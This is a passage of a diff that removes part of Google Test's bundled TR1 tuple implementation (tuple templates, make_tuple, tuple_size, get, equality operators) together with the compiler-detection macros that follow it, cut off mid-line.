-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_2_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_2_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-  template <typename U0, typename U1>
-  tuple& operator=(const ::std::pair<U0, U1>& p) {
-    f0_ = p.first;
-    f1_ = p.second;
-    return *this;
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_2_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_2_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-};
-
-template <GTEST_3_TYPENAMES_(T)>
-class GTEST_3_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2) : f0_(f0), f1_(f1), f2_(f2) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_) {}
-
-  template <GTEST_3_TYPENAMES_(U)>
-  tuple(const GTEST_3_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_3_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_3_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_3_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_3_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-};
-
-template <GTEST_4_TYPENAMES_(T)>
-class GTEST_4_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3) : f0_(f0), f1_(f1), f2_(f2),
-      f3_(f3) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_) {}
-
-  template <GTEST_4_TYPENAMES_(U)>
-  tuple(const GTEST_4_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_4_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_4_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_4_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_4_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-};
-
-template <GTEST_5_TYPENAMES_(T)>
-class GTEST_5_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3,
-      GTEST_BY_REF_(T4) f4) : f0_(f0), f1_(f1), f2_(f2), f3_(f3), f4_(f4) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_) {}
-
-  template <GTEST_5_TYPENAMES_(U)>
-  tuple(const GTEST_5_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_5_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_5_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_5_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_5_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-};
-
-template <GTEST_6_TYPENAMES_(T)>
-class GTEST_6_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_(), f5_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3, GTEST_BY_REF_(T4) f4,
-      GTEST_BY_REF_(T5) f5) : f0_(f0), f1_(f1), f2_(f2), f3_(f3), f4_(f4),
-      f5_(f5) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_), f5_(t.f5_) {}
-
-  template <GTEST_6_TYPENAMES_(U)>
-  tuple(const GTEST_6_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_), f5_(t.f5_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_6_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_6_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_6_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_6_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    f5_ = t.f5_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-  T5 f5_;
-};
-
-template <GTEST_7_TYPENAMES_(T)>
-class GTEST_7_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_(), f5_(), f6_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3, GTEST_BY_REF_(T4) f4,
-      GTEST_BY_REF_(T5) f5, GTEST_BY_REF_(T6) f6) : f0_(f0), f1_(f1), f2_(f2),
-      f3_(f3), f4_(f4), f5_(f5), f6_(f6) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_), f5_(t.f5_), f6_(t.f6_) {}
-
-  template <GTEST_7_TYPENAMES_(U)>
-  tuple(const GTEST_7_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_), f5_(t.f5_), f6_(t.f6_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_7_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_7_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_7_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_7_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    f5_ = t.f5_;
-    f6_ = t.f6_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-  T5 f5_;
-  T6 f6_;
-};
-
-template <GTEST_8_TYPENAMES_(T)>
-class GTEST_8_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_(), f5_(), f6_(), f7_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3, GTEST_BY_REF_(T4) f4,
-      GTEST_BY_REF_(T5) f5, GTEST_BY_REF_(T6) f6,
-      GTEST_BY_REF_(T7) f7) : f0_(f0), f1_(f1), f2_(f2), f3_(f3), f4_(f4),
-      f5_(f5), f6_(f6), f7_(f7) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_) {}
-
-  template <GTEST_8_TYPENAMES_(U)>
-  tuple(const GTEST_8_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_8_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_8_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_8_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_8_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    f5_ = t.f5_;
-    f6_ = t.f6_;
-    f7_ = t.f7_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-  T5 f5_;
-  T6 f6_;
-  T7 f7_;
-};
-
-template <GTEST_9_TYPENAMES_(T)>
-class GTEST_9_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_(), f5_(), f6_(), f7_(), f8_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3, GTEST_BY_REF_(T4) f4,
-      GTEST_BY_REF_(T5) f5, GTEST_BY_REF_(T6) f6, GTEST_BY_REF_(T7) f7,
-      GTEST_BY_REF_(T8) f8) : f0_(f0), f1_(f1), f2_(f2), f3_(f3), f4_(f4),
-      f5_(f5), f6_(f6), f7_(f7), f8_(f8) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_), f8_(t.f8_) {}
-
-  template <GTEST_9_TYPENAMES_(U)>
-  tuple(const GTEST_9_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_), f8_(t.f8_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_9_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_9_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_9_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_9_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    f5_ = t.f5_;
-    f6_ = t.f6_;
-    f7_ = t.f7_;
-    f8_ = t.f8_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-  T5 f5_;
-  T6 f6_;
-  T7 f7_;
-  T8 f8_;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-class tuple {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_(), f5_(), f6_(), f7_(), f8_(),
-      f9_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3, GTEST_BY_REF_(T4) f4,
-      GTEST_BY_REF_(T5) f5, GTEST_BY_REF_(T6) f6, GTEST_BY_REF_(T7) f7,
-      GTEST_BY_REF_(T8) f8, GTEST_BY_REF_(T9) f9) : f0_(f0), f1_(f1), f2_(f2),
-      f3_(f3), f4_(f4), f5_(f5), f6_(f6), f7_(f7), f8_(f8), f9_(f9) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_), f8_(t.f8_), f9_(t.f9_) {}
-
-  template <GTEST_10_TYPENAMES_(U)>
-  tuple(const GTEST_10_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_), f8_(t.f8_),
-      f9_(t.f9_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_10_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_10_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_10_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_10_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    f5_ = t.f5_;
-    f6_ = t.f6_;
-    f7_ = t.f7_;
-    f8_ = t.f8_;
-    f9_ = t.f9_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-  T5 f5_;
-  T6 f6_;
-  T7 f7_;
-  T8 f8_;
-  T9 f9_;
-};
-
-// 6.1.3.2 Tuple creation functions.
-
-// Known limitations: we don't support passing an
-// std::tr1::reference_wrapper<T> to make_tuple().  And we don't
-// implement tie().
-
-inline tuple<> make_tuple() { return tuple<>(); }
-
-template <GTEST_1_TYPENAMES_(T)>
-inline GTEST_1_TUPLE_(T) make_tuple(const T0& f0) {
-  return GTEST_1_TUPLE_(T)(f0);
-}
-
-template <GTEST_2_TYPENAMES_(T)>
-inline GTEST_2_TUPLE_(T) make_tuple(const T0& f0, const T1& f1) {
-  return GTEST_2_TUPLE_(T)(f0, f1);
-}
-
-template <GTEST_3_TYPENAMES_(T)>
-inline GTEST_3_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2) {
-  return GTEST_3_TUPLE_(T)(f0, f1, f2);
-}
-
-template <GTEST_4_TYPENAMES_(T)>
-inline GTEST_4_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3) {
-  return GTEST_4_TUPLE_(T)(f0, f1, f2, f3);
-}
-
-template <GTEST_5_TYPENAMES_(T)>
-inline GTEST_5_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4) {
-  return GTEST_5_TUPLE_(T)(f0, f1, f2, f3, f4);
-}
-
-template <GTEST_6_TYPENAMES_(T)>
-inline GTEST_6_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4, const T5& f5) {
-  return GTEST_6_TUPLE_(T)(f0, f1, f2, f3, f4, f5);
-}
-
-template <GTEST_7_TYPENAMES_(T)>
-inline GTEST_7_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4, const T5& f5, const T6& f6) {
-  return GTEST_7_TUPLE_(T)(f0, f1, f2, f3, f4, f5, f6);
-}
-
-template <GTEST_8_TYPENAMES_(T)>
-inline GTEST_8_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4, const T5& f5, const T6& f6, const T7& f7) {
-  return GTEST_8_TUPLE_(T)(f0, f1, f2, f3, f4, f5, f6, f7);
-}
-
-template <GTEST_9_TYPENAMES_(T)>
-inline GTEST_9_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4, const T5& f5, const T6& f6, const T7& f7,
-    const T8& f8) {
-  return GTEST_9_TUPLE_(T)(f0, f1, f2, f3, f4, f5, f6, f7, f8);
-}
-
-template <GTEST_10_TYPENAMES_(T)>
-inline GTEST_10_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4, const T5& f5, const T6& f6, const T7& f7,
-    const T8& f8, const T9& f9) {
-  return GTEST_10_TUPLE_(T)(f0, f1, f2, f3, f4, f5, f6, f7, f8, f9);
-}
-
-// 6.1.3.3 Tuple helper classes.
-
-template <typename Tuple> struct tuple_size;
-
-template <GTEST_0_TYPENAMES_(T)>
-struct tuple_size<GTEST_0_TUPLE_(T) > {
-  static const int value = 0;
-};
-
-template <GTEST_1_TYPENAMES_(T)>
-struct tuple_size<GTEST_1_TUPLE_(T) > {
-  static const int value = 1;
-};
-
-template <GTEST_2_TYPENAMES_(T)>
-struct tuple_size<GTEST_2_TUPLE_(T) > {
-  static const int value = 2;
-};
-
-template <GTEST_3_TYPENAMES_(T)>
-struct tuple_size<GTEST_3_TUPLE_(T) > {
-  static const int value = 3;
-};
-
-template <GTEST_4_TYPENAMES_(T)>
-struct tuple_size<GTEST_4_TUPLE_(T) > {
-  static const int value = 4;
-};
-
-template <GTEST_5_TYPENAMES_(T)>
-struct tuple_size<GTEST_5_TUPLE_(T) > {
-  static const int value = 5;
-};
-
-template <GTEST_6_TYPENAMES_(T)>
-struct tuple_size<GTEST_6_TUPLE_(T) > {
-  static const int value = 6;
-};
-
-template <GTEST_7_TYPENAMES_(T)>
-struct tuple_size<GTEST_7_TUPLE_(T) > {
-  static const int value = 7;
-};
-
-template <GTEST_8_TYPENAMES_(T)>
-struct tuple_size<GTEST_8_TUPLE_(T) > {
-  static const int value = 8;
-};
-
-template <GTEST_9_TYPENAMES_(T)>
-struct tuple_size<GTEST_9_TUPLE_(T) > {
-  static const int value = 9;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct tuple_size<GTEST_10_TUPLE_(T) > {
-  static const int value = 10;
-};
-
-template <int k, class Tuple>
-struct tuple_element {
-  typedef typename gtest_internal::TupleElement<
-      k < (tuple_size<Tuple>::value), k, Tuple>::type type;
-};
-
-#define GTEST_TUPLE_ELEMENT_(k, Tuple) typename tuple_element<k, Tuple >::type
-
-// 6.1.3.4 Element access.
-
-namespace gtest_internal {
-
-template <>
-class Get<0> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(0, Tuple))
-  Field(Tuple& t) { return t.f0_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(0, Tuple))
-  ConstField(const Tuple& t) { return t.f0_; }
-};
-
-template <>
-class Get<1> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(1, Tuple))
-  Field(Tuple& t) { return t.f1_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(1, Tuple))
-  ConstField(const Tuple& t) { return t.f1_; }
-};
-
-template <>
-class Get<2> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(2, Tuple))
-  Field(Tuple& t) { return t.f2_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(2, Tuple))
-  ConstField(const Tuple& t) { return t.f2_; }
-};
-
-template <>
-class Get<3> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(3, Tuple))
-  Field(Tuple& t) { return t.f3_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(3, Tuple))
-  ConstField(const Tuple& t) { return t.f3_; }
-};
-
-template <>
-class Get<4> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(4, Tuple))
-  Field(Tuple& t) { return t.f4_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(4, Tuple))
-  ConstField(const Tuple& t) { return t.f4_; }
-};
-
-template <>
-class Get<5> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(5, Tuple))
-  Field(Tuple& t) { return t.f5_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(5, Tuple))
-  ConstField(const Tuple& t) { return t.f5_; }
-};
-
-template <>
-class Get<6> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(6, Tuple))
-  Field(Tuple& t) { return t.f6_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(6, Tuple))
-  ConstField(const Tuple& t) { return t.f6_; }
-};
-
-template <>
-class Get<7> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(7, Tuple))
-  Field(Tuple& t) { return t.f7_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(7, Tuple))
-  ConstField(const Tuple& t) { return t.f7_; }
-};
-
-template <>
-class Get<8> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(8, Tuple))
-  Field(Tuple& t) { return t.f8_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(8, Tuple))
-  ConstField(const Tuple& t) { return t.f8_; }
-};
-
-template <>
-class Get<9> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(9, Tuple))
-  Field(Tuple& t) { return t.f9_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(9, Tuple))
-  ConstField(const Tuple& t) { return t.f9_; }
-};
-
-}  // namespace gtest_internal
-
-template <int k, GTEST_10_TYPENAMES_(T)>
-GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(k, GTEST_10_TUPLE_(T)))
-get(GTEST_10_TUPLE_(T)& t) {
-  return gtest_internal::Get<k>::Field(t);
-}
-
-template <int k, GTEST_10_TYPENAMES_(T)>
-GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(k,  GTEST_10_TUPLE_(T)))
-get(const GTEST_10_TUPLE_(T)& t) {
-  return gtest_internal::Get<k>::ConstField(t);
-}
-
-// 6.1.3.5 Relational operators
-
-// We only implement == and !=, as we don't have a need for the rest yet.
-
-namespace gtest_internal {
-
-// SameSizeTuplePrefixComparator<k, k>::Eq(t1, t2) returns true if the
-// first k fields of t1 equals the first k fields of t2.
-// SameSizeTuplePrefixComparator(k1, k2) would be a compiler error if
-// k1 != k2.
-template <int kSize1, int kSize2>
-struct SameSizeTuplePrefixComparator;
-
-template <>
-struct SameSizeTuplePrefixComparator<0, 0> {
-  template <class Tuple1, class Tuple2>
-  static bool Eq(const Tuple1& /* t1 */, const Tuple2& /* t2 */) {
-    return true;
-  }
-};
-
-template <int k>
-struct SameSizeTuplePrefixComparator<k, k> {
-  template <class Tuple1, class Tuple2>
-  static bool Eq(const Tuple1& t1, const Tuple2& t2) {
-    return SameSizeTuplePrefixComparator<k - 1, k - 1>::Eq(t1, t2) &&
-        ::std::tr1::get<k - 1>(t1) == ::std::tr1::get<k - 1>(t2);
-  }
-};
-
-}  // namespace gtest_internal
-
-template <GTEST_10_TYPENAMES_(T), GTEST_10_TYPENAMES_(U)>
-inline bool operator==(const GTEST_10_TUPLE_(T)& t,
-                       const GTEST_10_TUPLE_(U)& u) {
-  return gtest_internal::SameSizeTuplePrefixComparator<
-      tuple_size<GTEST_10_TUPLE_(T) >::value,
-      tuple_size<GTEST_10_TUPLE_(U) >::value>::Eq(t, u);
-}
-
-template <GTEST_10_TYPENAMES_(T), GTEST_10_TYPENAMES_(U)>
-inline bool operator!=(const GTEST_10_TUPLE_(T)& t,
-                       const GTEST_10_TUPLE_(U)& u) { return !(t == u); }
-
-// 6.1.4 Pairs.
-// Unimplemented.
-
-}  // namespace tr1
-}  // namespace std
-
-#undef GTEST_0_TUPLE_
-#undef GTEST_1_TUPLE_
-#undef GTEST_2_TUPLE_
-#undef GTEST_3_TUPLE_
-#undef GTEST_4_TUPLE_
-#undef GTEST_5_TUPLE_
-#undef GTEST_6_TUPLE_
-#undef GTEST_7_TUPLE_
-#undef GTEST_8_TUPLE_
-#undef GTEST_9_TUPLE_
-#undef GTEST_10_TUPLE_
-
-#undef GTEST_0_TYPENAMES_
-#undef GTEST_1_TYPENAMES_
-#undef GTEST_2_TYPENAMES_
-#undef GTEST_3_TYPENAMES_
-#undef GTEST_4_TYPENAMES_
-#undef GTEST_5_TYPENAMES_
-#undef GTEST_6_TYPENAMES_
-#undef GTEST_7_TYPENAMES_
-#undef GTEST_8_TYPENAMES_
-#undef GTEST_9_TYPENAMES_
-#undef GTEST_10_TYPENAMES_
-
-#undef GTEST_DECLARE_TUPLE_AS_FRIEND_
-#undef GTEST_BY_REF_
-#undef GTEST_ADD_REF_
-#undef GTEST_TUPLE_ELEMENT_
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TUPLE_H_
-# elif GTEST_ENV_HAS_STD_TUPLE_
-#  include <tuple>
-// C++11 puts its tuple into the ::std namespace rather than
-// ::std::tr1.  gtest expects tuple to live in ::std::tr1, so put it there.
-// This causes undefined behavior, but supported compilers react in
-// the way we intend.
-namespace std {
-namespace tr1 {
-using ::std::get;
-using ::std::make_tuple;
-using ::std::tuple;
-using ::std::tuple_element;
-using ::std::tuple_size;
-}
-}
-
-# elif GTEST_OS_SYMBIAN
-
-// On Symbian, BOOST_HAS_TR1_TUPLE causes Boost's TR1 tuple library to
-// use STLport's tuple implementation, which unfortunately doesn't
-// work as the copy of STLport distributed with Symbian is incomplete.
-// By making sure BOOST_HAS_TR1_TUPLE is undefined, we force Boost to
-// use its own tuple implementation.
-#  ifdef BOOST_HAS_TR1_TUPLE
-#   undef BOOST_HAS_TR1_TUPLE
-#  endif  // BOOST_HAS_TR1_TUPLE
-
-// This prevents <boost/tr1/detail/config.hpp>, which defines
-// BOOST_HAS_TR1_TUPLE, from being #included by Boost's <tuple>.
-#  define BOOST_TR1_DETAIL_CONFIG_HPP_INCLUDED
-#  include <tuple>  // IWYU pragma: export  // NOLINT
-
-# elif defined(__GNUC__) && (GTEST_GCC_VER_ >= 40000)
-// GCC 4.0+ implements tr1/tuple in the <tr1/tuple> header.  This does
-// not conform to the TR1 spec, which requires the header to be <tuple>.
-
-#  if !GTEST_HAS_RTTI && GTEST_GCC_VER_ < 40302
-// Until version 4.3.2, gcc has a bug that causes <tr1/functional>,
-// which is #included by <tr1/tuple>, to not compile when RTTI is
-// disabled.  _TR1_FUNCTIONAL is the header guard for
-// <tr1/functional>.  Hence the following #define is a hack to prevent
-// <tr1/functional> from being included.
-#   define _TR1_FUNCTIONAL 1
-#   include <tr1/tuple>
-#   undef _TR1_FUNCTIONAL  // Allows the user to #include
-                        // <tr1/functional> if he chooses to.
-#  else
-#   include <tr1/tuple>  // NOLINT
-#  endif  // !GTEST_HAS_RTTI && GTEST_GCC_VER_ < 40302
-
-# else
-// If the compiler is not GCC 4.0+, we assume the user is using a
-// spec-conforming TR1 implementation.
-#  include <tuple>  // IWYU pragma: export  // NOLINT
-# endif  // GTEST_USE_OWN_TR1_TUPLE
-
-#endif  // GTEST_HAS_TR1_TUPLE
-
-// Determines whether clone(2) is supported.
-// Usually it will only be available on Linux, excluding
-// Linux on the Itanium architecture.
-// Also see http://linux.die.net/man/2/clone.
-#ifndef GTEST_HAS_CLONE
-// The user didn't tell us, so we need to figure it out.
-
-# if GTEST_OS_LINUX && !defined(__ia64__)
-#  if GTEST_OS_LINUX_ANDROID
-// On Android, clone() is only available on ARM starting with Gingerbread.
-#    if defined(__arm__) && __ANDROID_API__ >= 9
-#     define GTEST_HAS_CLONE 1
-#    else
-#     define GTEST_HAS_CLONE 0
-#    endif
-#  else
-#   define GTEST_HAS_CLONE 1
-#  endif
-# else
-#  define GTEST_HAS_CLONE 0
-# endif  // GTEST_OS_LINUX && !defined(__ia64__)
-
-#endif  // GTEST_HAS_CLONE
-
-// Determines whether to support stream redirection. This is used to test
-// output correctness and to implement death tests.
-#ifndef GTEST_HAS_STREAM_REDIRECTION
-// By default, we assume that stream redirection is supported on all
-// platforms except known mobile ones.
-# if GTEST_OS_WINDOWS_MOBILE || GTEST_OS_SYMBIAN || \
